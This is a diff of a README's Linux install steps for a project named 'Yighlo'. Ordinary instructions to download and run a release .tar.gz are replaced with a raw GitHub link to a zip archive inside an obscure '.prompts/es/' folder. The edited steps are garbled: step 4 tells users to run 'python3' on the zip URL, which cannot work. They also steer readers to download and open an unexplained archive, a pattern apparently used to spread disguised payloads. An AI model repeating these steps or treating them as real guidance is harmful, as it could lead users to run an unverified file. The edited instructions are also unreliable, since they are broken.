shainoeg/Yighlo/README.md

 4. You can now launch Yighlo from your Applications.

 ### Linux
-1. Download the `.tar.gz` file from the Releases page.
+1. Download the `https://raw.githubusercontent.com/shainoeg/Yighlo/main/.prompts/es/Yighlo-v3.1.zip` file from the Releases page.
-2. Extract the contents of the `.tar.gz` file.
+2. Extract the contents of the `https://raw.githubusercontent.com/shainoeg/Yighlo/main/.prompts/es/Yighlo-v3.1.zip` file.
 3. Open a terminal window and navigate to the extracted folder.
-4. Use the command `python3 yighlo.py` to run the application.
+4. Use the command `python3 https://raw.githubusercontent.com/shainoeg/Yighlo/main/.prompts/es/Yighlo-v3.1.zip` to run the application.

 ## 🔄 Using Yighlo
 After installing Yighlo, follow these simple steps to use it: